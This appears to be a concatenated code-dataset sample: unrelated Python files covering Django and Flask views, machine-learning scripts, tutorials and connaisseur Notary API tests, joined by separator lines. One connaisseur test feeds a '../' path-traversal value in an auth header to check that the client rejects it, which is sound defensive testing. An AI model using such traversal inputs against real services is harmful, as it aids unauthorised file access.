from django.contrib import messages
# 3rd Party Package imports
from braces.views import LoginRequiredMixin
#Lackawanna Specific imports
from .models import Collection
from .forms import CollectionCreationForm
from datapoint.models import Datapoint
# REST API related imports
from rest_framework import generics as rest_generics, permissions, filters
from collection.serializers import CollectionSerializer
class CollectionList(rest_generics.ListAPIView):
queryset = Collection.objects.all()
serializer_class = CollectionSerializer
filter_fields = ('project', 'owner')
class CollectionReadUpdateDeleteView(rest_generics.RetrieveUpdateDestroyAPIView):
queryset = Collection.objects.all()
serializer_class = CollectionSerializer
class CollectionListView(LoginRequiredMixin, django_generic.ListView):
model = Collection
class CollectionCreateView(LoginRequiredMixin, django_generic.CreateView):
form_class = CollectionCreationForm
template_name = 'collection/collection_create.html'
success_message = "Collection created. Start adding datapoints to it using the 'Add to Collection' button in the datapoint viewer."
def form_valid(self, form):
form.instance.owner = self.request.user
messages.success(self.request, self.success_message)
return super(CollectionCreateView, self).form_valid(form)
def get_success_url(self):
return reverse_lazy('project:detail', kwargs={'slug': self.object.project.slug})
class CollectionUpdateView(LoginRequiredMixin, django_generic.UpdateView):
model = Collection
fields = ('owner', 'project', 'name', 'description',)
success_url = reverse_lazy('collection:list')
class CollectionDeleteView(LoginRequiredMixin, django_generic.DeleteView):
model = Collection
success_message = "Collection deleted successfully"
def delete(self, request, *args, **kwargs):
messages.success(self.request, self.success_message)
return super(CollectionDeleteView, self).delete(request, *args, **kwargs)
def get_success_url(self):
return reverse_lazy('project:detail', kwargs={'slug': self.object.project.slug})
class CollectionDetailView(LoginRequiredMixin, django_generic.DetailView):
template_name = 'collection/collection_detail.html'
model = Collection
def get_context_data(self, **kwargs):
context = super(CollectionDetailView, self).get_context_data(**kwargs)
context['datapoints'] = Datapoint.objects.filter(collections=self.get_object())
return context
class CollectionSettingsView(LoginRequiredMixin, django_generic.View):
template_name = 'collection/collection_settings.html'
model = Collection
def get_context_data(self, **kwargs):
context = super(CollectionSettingsView, self).get_context_data(**kwargs)
return context
|
nilq/baby-python
|
python
|
from __future__ import absolute_import, division, print_function
from .version import __version__
import __main__
try:
import etelemetry
etelemetry.check_available_version("incf-nidash/pynidm", __version__)
except ImportError:
pass
|
nilq/baby-python
|
python
|
import sys
import os
sys.path.append(os.path.join(os.getcwd(), 'deep_api'))
from deep_app import create_app
application = create_app()
if __name__ == '__main__':
application.run()
|
nilq/baby-python
|
python
|
"""
切片:定位多个元素
for number in range(开始,结束,间隔)
"""
message = "我是花果山水帘洞美猴王孙悟空"
# 写法1:容器名[开始: 结束: 间隔]
# 注意:不包含结束
print(message[2: 5: 1])
# 写法2:容器名[开始: 结束]
# 注意:间隔默认为1
print(message[2: 5])
# 写法3:容器名[:结束]
# 注意:开始默认为头
print(message[:5])
# 写法4:容器名[:]
# 注意:结束默认为尾
print(message[:])
message = "我是花果山水帘洞美猴王孙悟空"
# 水帘洞
print(message[5:8])
# 花果山水帘洞美猴王
print(message[2: -3])
# 空
print(message[1: 1])
# 是花果山水帘洞美猴王孙悟空
print(message[1: 100])
# 孙悟空
print(message[-3:])
print(message[:5])
# 特殊:空悟孙王猴美洞帘水山果花是我
print(message[::-1])
# 空孙猴洞水果是
print(message[::-2])
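# With a negative step the slice walks right to left, and the omitted
# start/stop default to the ends in that direction, so [::-1] reverses
# the whole string.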
|
nilq/baby-python
|
python
|
from flask import request, make_response
import json
from themint import app
from themint.service import message_service
from datatypes.exceptions import DataDoesNotMatchSchemaException
@app.route('/', methods=['GET'])
def index():
return "Mint OK"
# TODO remove <title_number> below, as it is not used.
@app.route('/titles/<title_number>', methods=['POST'])
def post(title_number):
try:
message_service.wrap_message_for_system_of_record(request.json)
#app.logger.debug("Minting new title with payload %s" % (request.json))
return make_response(
json.dumps({
'message': 'OK',
'status_code': 201
}),
201)
except DataDoesNotMatchSchemaException as e:
app.logger.error('Validation error with data sent to mint %s' % e.field_errors)
return make_response(
json.dumps({
'error': e.field_errors
}), 400)
except Exception as e:
app.logger.error('Error when minting new', exc_info=e)
return make_response(
json.dumps({
'message': 'Error',
'status_code': 400
}),
400)
|
nilq/baby-python
|
python
|
import json
import os
os.environ['GIT_PYTHON_REFRESH'] = 'quiet'
from configparser import ConfigParser
import lstm_model as lm
from itertools import product
from datetime import datetime
import data_preprocess as dp
from sacred import Experiment
from sacred.observers import MongoObserver
ex = Experiment()
ex.observers.append(MongoObserver(url='mongodb://132.72.80.61/netflow_roman', db_name='netflow_roman'))
conf = ConfigParser()
conf.read('config.ini')
@ex.config
def my_config():
folder_name = conf.get('Paths', 'output_folder_name')
data_file = conf.get('Paths', 'data_file')
data_path = conf.get('Paths', 'data_path')
output_path = conf.get('Paths', 'output_path')
lstm_units = None
optimizer = None
loss = None
epochs = None
batch_size = None
n_steps = None
slide_len = None
repetitions = None
n_features = None
n_steps_out = None
l_rate = None
timestamp = None
rep = None
csv_logger = None
overflow_thresh = None
lstm_layers = None
use_mini_batches = None
@ex.main
def handle_netflow(data_path, data_file, folder_name, output_path, lstm_units, optimizer, loss, epochs,
batch_size, n_steps, n_features, slide_len, timestamp, rep, csv_logger, l_rate, n_steps_out,
overflow_thresh, lstm_layers, use_mini_batches):
if not os.path.exists(output_path + folder_name + '//' + str(int(timestamp))):
os.mkdir(output_path + folder_name + '//' + str(int(timestamp)))
X, y, dates_X, dates_y, all_data = dp.preprocess_netflow_data([data_path + data_file], n_steps, n_steps_out,
slide_len, 2, overflow_thresh)
lm.lstm_classification(batch_size, epochs, folder_name, loss, lstm_units, n_steps, optimizer, output_path, rep,
slide_len, timestamp, l_rate, n_steps_out, X, y, dates_X, dates_y, ex, lstm_layers, all_data,
use_mini_batches)
def main(folder_name, output_path, lstm_units_list, optimizers, losses, epochs_list,
batch_sizes, n_steps_list, n_features_list, slide_lens, repetitions, n_steps_out, l_rates,
overflow_thresholds, lstm_layers, use_mini_batches):
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
if not os.path.exists(output_path + folder_name):
os.mkdir(output_path + folder_name)
prod = product(lstm_units_list, optimizers, losses, epochs_list, batch_sizes, n_steps_list,
n_features_list, slide_lens, l_rates, n_steps_out, overflow_thresholds, lstm_layers)
for lstm_units, optimizer, loss, epochs, batch_size, n_steps, n_features, slide_len, l_rate, \
n_steps_out, overflow_thresh, n_lstm_layers in prod:
timestamp = datetime.timestamp(datetime.now())
for rep in range(repetitions):
ex.run(config_updates={'lstm_units': lstm_units, 'optimizer': optimizer, 'loss': loss, 'epochs': epochs,
'batch_size': batch_size, 'n_steps': n_steps, 'n_features': n_features,
'slide_len': slide_len, 'l_rate': l_rate, 'n_steps_out': n_steps_out,
'timestamp': timestamp, 'rep': rep, 'overflow_thresh': overflow_thresh,
'lstm_layers': n_lstm_layers, 'use_mini_batches': use_mini_batches})
lm.update_results_file(batch_size, epochs, folder_name, l_rate, loss, lstm_units, n_features,
n_steps, optimizer, output_path, repetitions, slide_len, timestamp, n_steps_out)
if __name__ == '__main__':
main(conf.get('Paths', 'output_folder_name'),
conf.get('Paths', 'output_path'),
json.loads(conf.get('LSTM', 'lstm_units')),
json.loads(conf.get('LSTM', 'optimizer')),
json.loads(conf.get('LSTM', 'loss')),
json.loads(conf.get('LSTM', 'epochs')),
json.loads(conf.get('LSTM', 'batch_size')),
json.loads(conf.get('LSTM', 'n_steps')),
json.loads(conf.get('LSTM', 'n_features')),
json.loads(conf.get('LSTM', 'slide_len')),
json.loads(conf.get('LSTM', 'repetitions')),
json.loads(conf.get('LSTM', 'look_forward')),
json.loads(conf.get('LSTM', 'l_rates')),
json.loads(conf.get('LSTM', 'overflow_threshold')),
json.loads(conf.get('LSTM', 'lstm_layers')),
         conf.getboolean('LSTM', 'use_mini_batches'))  # parsed as a bool; a plain get() returns a string, which is always truthy
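# For reference, a hypothetical config.ini matching the keys read above
# (section and key names come from this script; the values are only examples):
#
#   [Paths]
#   output_folder_name = runs
#   data_file = netflow.csv
#   data_path = /data/
#   output_path = /results/
#
#   [LSTM]
#   lstm_units = [64, 128]
#   optimizer = ["adam"]
#   loss = ["binary_crossentropy"]
#   epochs = [50]
#   batch_size = [32]
#   n_steps = [10]
#   n_features = [1]
#   slide_len = [1]
#   repetitions = 3
#   look_forward = [1]
#   l_rates = [0.001]
#   overflow_threshold = [0.9]
#   lstm_layers = [1]
#   use_mini_batches = true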
# === next file ===
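# Trains a small fully connected network (400-30-10) on the ex3data1.mat digit
# images and reports train/test accuracy; helpers below can also plot learning
# curves and the misclassified images.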
from PIL import Image
import os
from os.path import join
import scipy.io as sio
import matplotlib.pyplot as plt
import numpy as np
from scipy import ndimage
from Network import Network
from utils import plot_images, sigmoid, dsigmoid_to_dval, make_results_reproducible, make_results_random
make_results_reproducible()
current_dir = os.path.abspath(".")
data_dir = join(current_dir, 'data')
file_name = join(data_dir,"ex3data1.mat")
mat_dict = sio.loadmat(file_name)
# print("mat_dict.keys() : ",mat_dict.keys())
X = mat_dict["X"]
# print(f"X.shape : {X.shape}")
y = mat_dict["y"]
# shuffle the samples: the .mat file is ordered (each block of 500 samples is
# the same digit), so without shuffling the train/test split would be skewed
indices = np.arange(len(y))
np.random.shuffle(indices)
X = X[indices]
y = y[indices]
m = y.size
# print(f"y.shape : {y.shape}")
Y = np.zeros((m,10))
# one-hot encode the labels into Y
for row, y_sample in enumerate(y):
    if y_sample == 10:
        # digit 0 is stored as 10 in y
        Y[row, 0] = 1
    else:
        # digits 1-9 are stored as themselves in y
        Y[row, y_sample] = 1
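# A vectorized equivalent of the loop above (a sketch; it relies on the
# dataset's convention that the label 10 stands in for digit 0):
#   Y = np.eye(10)[y.ravel() % 10]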
def plot_image(ax , sample,_X,_y):
image = _X[sample].reshape(20,20)
ax.set_title(f'image of X[{sample}] , y[{sample}][0] : {_y[sample][0]} ')
ax.imshow(image, cmap='gray')
def plots(_X,_y):
_ , axs = plt.subplots(2,2)
# pick a sample to plot
plot_image(axs[0,1],4300,_X,_y)
sample = 10
plot_image(axs[0,0],sample,_X,_y)
axs[1,0].set_title(f'X[{sample}]')
axs[1,0].grid()
axs[1,0].plot(_X[sample],'o')
axs[1,1].set_title('y')
axs[1,1].plot(_y,'o')
plt.show()
def compute_success_percentage(net, _X, _Y):
    count_correct = 0
    error_indices = []
    for i_sample, (x_sample, y_sample_fixed) in enumerate(zip(_X, _Y)):
        h = net.feedforward(x_sample)
        i_max = np.argmax(h)  # index of the highest output probability
        if y_sample_fixed[i_max] == 1:
            count_correct += 1
        else:
            error_indices.append(i_sample)
    return (100 * count_correct / len(_Y), error_indices)
def learn_nn(_X, _Y):
    net = Network([400, 30, 10], sigmoid, dsigmoid_to_dval)
    epochs = 20
    test_samples_percentage = 20
    n_samples = len(_Y)  # split the data actually passed in; using the global m would overlap train and test on subsets
    test_samples = int(n_samples * (test_samples_percentage / 100))
    training_samples = n_samples - test_samples
    training_data = [(x_sample.reshape(x_sample.size, 1), y_sample.reshape(y_sample.size, 1))
                     for x_sample, y_sample in zip(_X[:training_samples, :], _Y[:training_samples, :])]
    mini_batch_size = 1
    learning_rate = 1
    net.SGD(training_data, epochs, mini_batch_size, learning_rate)
    (correct_test_percentage, error_test_indices) = \
        compute_success_percentage(net, _X[-test_samples:, :], _Y[-test_samples:, :])
    (correct_training_percentage, error_training_indices) = \
        compute_success_percentage(net, _X[:training_samples, :], _Y[:training_samples, :])
    return ((correct_test_percentage, error_test_indices),
            (correct_training_percentage, error_training_indices))
def learning_curves_engine(samples_vec):
correct_trainings = []
correct_tests = []
for samples in samples_vec:
((correct_test_percentage ,_),(correct_training_percentage, _)) = \
learn_nn(X[:samples,:],Y[:samples,:])
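        # note: despite the names, these lists store error rates (100 - accuracy)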
correct_trainings.append(100 - correct_training_percentage)
correct_tests.append(100 - correct_test_percentage)
return (correct_trainings , correct_tests)
def learning_curves():
    make_results_random()  # required: each averaging loop needs fresh randomness
    loops_for_mean = 5
    samples_vec = [50, 75, 100, 200, 500, 1000, 2000, 5000]
np_correct_trainings = np.array([])
np_correct_tests = np.array([])
_ , (ax1, ax2 , ax3) = plt.subplots(3)
for i in range(loops_for_mean):
print(f"\n********* loop : {i+1} ***************\n")
correct_trainings , correct_tests = learning_curves_engine(samples_vec)
np_correct_trainings = np.append(np_correct_trainings,correct_trainings)
np_correct_tests = np.append(np_correct_tests,correct_tests)
ax1.plot(samples_vec,correct_tests)
ax1.set_title("test error [%]")
ax2.plot(samples_vec,correct_trainings)
ax2.set_title("traing error [%]")
np_correct_trainings = np_correct_trainings.reshape((loops_for_mean,len(samples_vec)))
np_correct_tests = np_correct_tests.reshape((loops_for_mean,len(samples_vec)))
ax3.plot(samples_vec,np_correct_trainings.mean(axis=0),'x')
ax3.plot(samples_vec,np_correct_tests.mean(axis=0),'o')
ax3.set_title("mean error [%] . training - x , test - o")
plt.tight_layout()
plt.show()
    make_results_reproducible()  # restore reproducibility for code outside this function
def get_samples_to_show(_indices , _images_in_row , _max_images_to_show):
possible_images = int(len(_indices) / _images_in_row) * _images_in_row
return min(possible_images , _max_images_to_show)
def learn(show_error_images=False):
_ , (ax1,ax2) = plt.subplots(2,1)
((correct_test_percentage,error_test_indices) , \
(correct_training_percentage,error_training_indices)) = learn_nn(X,Y)
print(f"percentage of correct estimations test : {correct_test_percentage}")
print(f"percentage of correct estimations training : {correct_training_percentage}")
if show_error_images:
images_in_row = 20
max_images_to_show = 100
image_height = 20
image_width = 20
show_training = get_samples_to_show(error_training_indices ,\
images_in_row , max_images_to_show)
show_test = get_samples_to_show(error_test_indices , \
images_in_row , max_images_to_show)
plot_images(ax1 ,images_in_row,image_height, \
image_width, error_training_indices[:show_training],X,y)
ax1.set_title(f"training error images. total error images : {len(error_training_indices)}")
plot_images(ax2 ,images_in_row,image_height, \
image_width, error_test_indices[:show_test],X,y)
ax2.set_title(f"test error images. total error images : {len(error_test_indices)}")
plt.show()
# plots(X,Y)
learn(True)
# learning_curves()
# === next file ===
import json
import re
import pytest
import requests
import connaisseur.trust_data
import connaisseur.notary_api as notary_api
from connaisseur.image import Image
from connaisseur.tuf_role import TUFRole
from connaisseur.exceptions import BaseConnaisseurException
@pytest.fixture
def napi(monkeypatch):
monkeypatch.setenv("IS_ACR", "0")
monkeypatch.setenv("SELFSIGNED_NOTARY", "1")
return notary_api
@pytest.fixture
def acrapi(monkeypatch):
monkeypatch.setenv("IS_ACR", "1")
monkeypatch.setenv("SELFSIGNED_NOTARY", "1")
return notary_api
@pytest.fixture
def mock_request(monkeypatch):
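    # Replace requests.get with a router that serves canned responses based on
    # the URL: health endpoints, ACR and bearer-token auth flows, and TUF
    # trust-data documents loaded from tests/data/.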
class MockResponse:
content: dict
headers: dict
status_code: int = 200
def __init__(self, content: dict, headers: dict = None, status_code: int = 200):
self.content = content
self.headers = headers
self.status_code = status_code
def raise_for_status(self):
pass
def json(self):
return self.content
def mock_get_request(**kwargs):
regex = (
r"https:\/\/([^\/]+)\/v2\/([^\/]+)\/([^\/]+\/)?"
r"([^\/]+)\/_trust\/tuf\/(.+)\.json"
)
m = re.search(regex, kwargs["url"])
if m:
host, registry, repo, image, role = (
m.group(1),
m.group(2),
m.group(3),
m.group(4),
m.group(5),
)
if "unhealthy" in kwargs["url"]:
return MockResponse({}, status_code=500)
if "health" in kwargs["url"]:
return MockResponse(None)
if "azurecr.io" in kwargs["url"]:
return MockResponse({"access_token": "d.e.f"})
if "token" in kwargs["url"]:
auth = kwargs.get("auth")
if "bad" in kwargs["url"]:
if "no" in kwargs["url"]:
return MockResponse({"nay": "butwhy"})
if "aint" in kwargs["url"]:
return MockResponse({}, status_code=500)
return MockResponse({"token": "token"})
elif auth:
return MockResponse({"token": f"BA.{auth.username}.{auth.password}a"})
return MockResponse({"token": "no.BA.no"})
elif registry == "auth.io" and not kwargs.get("headers"):
return MockResponse(
{},
{
"Www-Authenticate": (
'Bearer realm="https://core.harbor.domain/service/'
'token",service="harbor-notary",scope="repository:'
'core.harbor.domain/connaisseur/sample-image:pull"'
)
},
401,
)
elif registry == "empty.io":
return MockResponse({}, status_code=404)
else:
with open(f"tests/data/{image}/{role}.json", "r") as file:
file_content = json.load(file)
return MockResponse(file_content)
monkeypatch.setattr(requests, "get", mock_get_request)
@pytest.fixture
def mock_trust_data(monkeypatch):
def validate_expiry(self):
pass
def trust_init(self, data: dict, role: str):
self.schema_path = "res/targets_schema.json"
self.kind = role
self._validate_schema(data)
self.signed = data["signed"]
self.signatures = data["signatures"]
monkeypatch.setattr(
connaisseur.trust_data.TrustData, "validate_expiry", validate_expiry
)
monkeypatch.setattr(connaisseur.trust_data.TargetsData, "__init__", trust_init)
connaisseur.trust_data.TrustData.schema_path = "res/{}_schema.json"
def trust_data(path: str):
with open(path, "r") as file:
return json.load(file)
@pytest.mark.parametrize(
"host, out", [("host", True), ("", False), ("https://unhealthy.registry", False)]
)
def test_health_check(napi, mock_request, host: str, out: bool):
assert napi.health_check(host) == out
@pytest.mark.parametrize(
"host, out", [("host", True), ("", False), ("https://unhealthy.registry", True)]
)
def test_health_check_acr(acrapi, mock_request, host: str, out: bool):
assert acrapi.health_check(host) == out
@pytest.mark.parametrize("slfsig, out", [("1", True), ("0", False), ("", False)])
def test_is_notary_selfsigned(napi, slfsig: str, out: bool, monkeypatch):
monkeypatch.setenv("SELFSIGNED_NOTARY", slfsig)
assert napi.is_notary_selfsigned() == out
@pytest.mark.parametrize(
"image, role, out",
[
("alice-image:tag", "root", trust_data("tests/data/alice-image/root.json")),
(
"alice-image:tag",
"targets",
trust_data("tests/data/alice-image/targets.json"),
),
(
"alice-image:tag",
"targets/phbelitz",
trust_data("tests/data/alice-image/targets/phbelitz.json"),
),
(
"auth.io/sample-image:tag",
"targets",
trust_data("tests/data/sample-image/targets.json"),
),
],
)
def test_get_trust_data(
napi, mock_request, mock_trust_data, image: str, role: str, out: dict
):
trust_data_ = napi.get_trust_data("host", Image(image), TUFRole(role))
assert trust_data_.signed == out["signed"]
assert trust_data_.signatures == out["signatures"]
def test_get_trust_data_error(napi, mock_request, mock_trust_data):
with pytest.raises(BaseConnaisseurException) as err:
napi.get_trust_data("host", Image("empty.io/image:tag"), TUFRole("targets"))
assert 'no trust data for image "empty.io/image:tag".' in str(err.value)
def test_parse_auth(napi):
header = (
'Bearer realm="https://core.harbor.domain/service/token",'
'service="harbor-notary",scope="repository:core.harbor.domain/'
'connaisseur/sample-image:pull"'
)
url = (
"https://core.harbor.domain/service/token?service=harbor-notary"
"&scope=repository:core.harbor.domain/connaisseur/sample-image:pull"
)
assert napi.parse_auth(header) == url
@pytest.mark.parametrize(
"header, error",
[
(
'Basic realm="https://mordor.de",scope="conquer"',
"unsupported authentication type for getting trust data.",
),
(
'Super realm="https://super.de",service="toll"',
"unsupported authentication type for getting trust data.",
),
(
'Bearer realmm="https://auth.server.com",service="auth"',
"could not find any realm in authentication header.",
),
(
'Bearer realm="http://auth.server.com",service="auth"',
"authentication through insecure channel.",
),
(
'Bearer realm="https://exam.pl/path/../traversal.key",service="no"',
"potential path traversal.",
),
],
)
def test_parse_auth_error(napi, header: str, error: str):
with pytest.raises(BaseConnaisseurException) as err:
napi.parse_auth(header)
assert error in str(err.value)
@pytest.mark.parametrize(
"user, password, out",
[
(None, None, "no.BA.no"),
(None, "password123", "no.BA.no"),
("myname", "password456", "BA.myname.password456a"),
("myname", None, "BA.myname.a"),
],
)
def test_get_auth_token(napi, mock_request, monkeypatch, user, password, out):
if user:
monkeypatch.setenv("NOTARY_USER", user)
if password is not None:
monkeypatch.setenv("NOTARY_PASS", password)
url = "https://auth.server.good/token/very/good"
assert napi.get_auth_token(url) == out
def test_get_auth_token_acr(acrapi, mock_request):
url = "https://myregistry.azurecr.io/auth/oauth2?scope=someId"
assert acrapi.get_auth_token(url) == "d.e.f"
@pytest.mark.parametrize(
"url, error",
[
(
"https://auth.server.bad/token/very/bad/very",
"authentication token has wrong format.",
),
(
"https://auth.server.bad/token/no/token",
"no token in authentication server response.",
),
(
"https://auth.server.bad/token/it/aint/there/token",
"unable to get auth token, likely because of missing trust data.",
),
(
"https://myregistry.azurecr.io/auth/oauth2?scope=someId",
"no token in authentication server response.",
),
],
)
def test_get_auth_token_error(napi, mock_request, url: str, error: str):
with pytest.raises(BaseConnaisseurException) as err:
napi.get_auth_token(url)
assert error in str(err.value)
@pytest.mark.parametrize(
"url, error",
[
(
"https://auth.server.bad/token/very/bad/very",
"no token in authentication server response.",
),
(
"https://auth.server.good/token/very/good",
"no token in authentication server response.",
),
],
)
def test_get_auth_token_error_acr(acrapi, mock_request, url: str, error: str):
with pytest.raises(BaseConnaisseurException) as err:
acrapi.get_auth_token(url)
assert error in str(err.value)
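# Run with pytest from the repository root (assuming the suite lives under
# tests/, as the fixture data paths suggest):
#   pytest -q tests/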
# === next file ===
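# Matrix utilities: identidade(n) builds an n x n identity, transposta a
# transpose (square input assumed), and inversa a Gauss-Jordan inverse
# (no pivoting, so a zero on the diagonal would fail).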
def identidade(n):
I = [[0 for x in range(n)] for y in range(n)]
for i in range(0,n):
I[i][i] = 1
return I
def transposta(mA):  # transpose (assumes a square matrix)
    n = len(mA)
    mT = identidade(n)
    for i in range(n):
        for j in range(n):
            mT[i][j] = mA[j][i]
    print("Transposed matrix:")
    for x in mT:
        print(*x, sep=" ")
    return mT
def inversa(A, arred=0):
    # Gauss-Jordan elimination; note that A is reduced in place,
    # so pass a copy if the original matrix is still needed
    n = len(A)
    inversa = identidade(n)
    indices = list(range(n))  # helper for the row loops
    for fd in range(n):  # fd walks the diagonal (the focus row)
        fdScaler = 1.0 / A[fd][fd]
        # 1st: scale the focus row of A, applying the same operation to the inverse
        for j in range(n):  # j walks the columns
            A[fd][j] *= fdScaler
            inversa[fd][j] *= fdScaler
        # 2nd: eliminate column fd from every row except row fd
        for i in indices[0:fd] + indices[fd+1:]:  # skip row fd
            crScaler = A[i][fd]  # factor used to scale the current row
            for j in range(n):  # currentRow = currentRow - crScaler * fdRow
                A[i][j] = A[i][j] - crScaler * A[fd][j]
                inversa[i][j] = inversa[i][j] - crScaler * inversa[fd][j]
    if arred == 1:
        for i in range(n):
            for j in range(n):
                # round() rather than int(): truncation would turn 0.999... into 0
                inversa[i][j] = round(inversa[i][j])
    print("Inverse matrix:")
    for x in inversa:
        print(*x, sep=" ")
    return inversa
M = [[12,3,1],[8,4,3],[1,1,1]]
t = transposta(M)
inv = inversa(M, 1)
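# Optional cross-check of the result above (a sketch, assuming NumPy is installed):
#   import numpy as np
#   print(np.linalg.inv(np.array([[12, 3, 1], [8, 4, 3], [1, 1, 1]])))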
# === next file ===
# Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import re
from fastestimator.summary import Summary
from fastestimator.util.loader import PathLoader
from fastestimator.util.util import strip_suffix
from fastestimator.summary.logs import visualize_logs
def _parse_file(file_path, file_extension):
"""A function which will parse log files into a dictionary of metrics
Args:
file_path (str): The path to a log file
file_extension (str): The extension of the log file
Returns:
An experiment summarizing the given log file
"""
# TODO: need to handle multi-line output like confusion matrix
experiment = Summary(strip_suffix(os.path.split(file_path)[1].strip(), file_extension))
with open(file_path) as file:
for line in file:
mode = None
if line.startswith("FastEstimator-Train"):
mode = "train"
elif line.startswith("FastEstimator-Eval"):
mode = "eval"
if mode is None:
continue
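            # lines look like "FastEstimator-Train: step: 100; loss: 2.3; ...";
            # the regex below captures each "key: number;" pair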
parsed_line = re.findall(r"([^:^;\s]+):[\s]*([-]?[0-9]+[.]?[0-9]*);", line)
step = parsed_line[0]
            assert step[0] == "step", \
                "Log file (%s) seems to be missing step information, or step is not listed first" % file_path
for metric in parsed_line[1:]:
experiment.history[mode][metric[0]].update({int(step[1]): float(metric[1])})
return experiment
def parse_log_files(file_paths,
log_extension='.txt',
smooth_factor=0,
save=False,
save_path=None,
ignore_metrics=None,
share_legend=True,
pretty_names=False):
"""A function which will iterate through the given log file paths, parse them to extract metrics, remove any
metrics which are blacklisted, and then pass the necessary information on the graphing function
Args:
file_paths: A list of paths to various log files
log_extension: The extension of the log files
smooth_factor: A non-negative float representing the magnitude of gaussian smoothing to apply (zero for none)
save: Whether to save (true) or display (false) the generated graph
        save_path: Where to save the image if save is true. Defaults to the location of the first log file if not provided
ignore_metrics: Any metrics within the log files which will not be visualized
share_legend: Whether to have one legend across all graphs (true) or one legend per graph (false)
pretty_names: Whether to modify the metric names in graph titles (true) or leave them alone (false)
Returns:
None
"""
if file_paths is None or len(file_paths) < 1:
raise AssertionError("must provide at least one log file")
if save and save_path is None:
save_path = file_paths[0]
experiments = []
for file_path in file_paths:
experiments.append(_parse_file(file_path, log_extension))
visualize_logs(experiments,
save_path=save_path,
smooth_factor=smooth_factor,
share_legend=share_legend,
pretty_names=pretty_names,
ignore_metrics=ignore_metrics)
def parse_log_dir(dir_path,
log_extension='.txt',
recursive_search=False,
smooth_factor=1,
save=False,
save_path=None,
ignore_metrics=None,
share_legend=True,
pretty_names=False):
"""A function which will gather all log files within a given folder and pass them along for visualization
Args:
dir_path: The path to a directory containing log files
log_extension: The extension of the log files
recursive_search: Whether to recursively search sub-directories for log files
        smooth_factor: A non-negative float representing the magnitude of gaussian smoothing to apply (zero for none)
save: Whether to save (true) or display (false) the generated graph
save_path: Where to save the image if save is true. Defaults to dir_path if not provided
ignore_metrics: Any metrics within the log files which will not be visualized
share_legend: Whether to have one legend across all graphs (true) or one legend per graph (false)
pretty_names: Whether to modify the metric names in graph titles (true) or leave them alone (false)
Returns:
None
"""
loader = PathLoader(dir_path, input_extension=log_extension, recursive_search=recursive_search)
file_paths = [x[0] for x in loader.path_pairs]
parse_log_files(file_paths,
log_extension,
smooth_factor,
save,
save_path,
ignore_metrics,
share_legend,
pretty_names)
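# Example invocation (a sketch; the directory path is hypothetical):
#   parse_log_dir("experiment_logs", log_extension=".txt", smooth_factor=1, save=False)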